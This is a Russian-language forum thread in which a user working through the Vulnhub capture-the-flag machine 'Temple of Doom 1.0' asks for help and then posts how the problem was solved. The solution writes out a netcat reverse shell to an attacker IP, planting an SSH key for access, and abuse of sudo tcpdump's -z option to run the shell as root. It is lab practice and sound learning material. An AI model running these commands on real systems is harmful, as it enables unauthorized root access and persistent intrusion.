• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Не могу запустить TCPDUMP на взломанном хосте. Temple of Doom 1.0

  • Автор темы bb-8
  • Дата начала
B

bb-8

Всем привет! Я выполняют CTF Temple of Doom 1.0 взятый с Vulnhub.
Мне удалось получить шелл под юзером "fireman" и теперь задача запустить tcpdump от root с моим скриптом (/tmp/shell) и на атакующем хосте прослушать через nc -lvp 445

Тут видно что юзер fireman и почему-то tcpdump даже версию не показывает. Так же можно увидеть содержимое файла shell
27744


Вот команда, которую я пытаюсь запустить. Как видите сами, на атакующий хост ничего не приходит, да и на взломанном хосте никакой информации о процессе tcpdump на консоле тоже нет. Может я что-то не так делаю?
sudo tcpdump -ln -i eth0 -w /dev/null -z /tmp/shell -Z root
27745


вот, например, после команды sudo -l (юзер fireman) я даже не могу узнать версию tcpdump, a iptables могу узнать версию
27762


27763


Задача решена:

Я добавил свой public key на взломанном хосте в папку .ssh
mkdir .ssh
touch authorized_keys
echo ssh-rsa .............. > /home/fireman/.ssh/authorized_keys

После этого я спокойно вошел по SSH и запустил-таки tcpdump
echo nc 172.20.10.7 1234 -e /bin/bash > /tmp/rev.sh && chmod +x /tmp/rev.sh
sudo tcpdump -ln -w /dev/null -W 1 -G 1 -z /tmp/rev.sh -Z root

И вот что я нашел в папке /root
27767
 
  • Нравится
Реакции: Сергей Попов
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ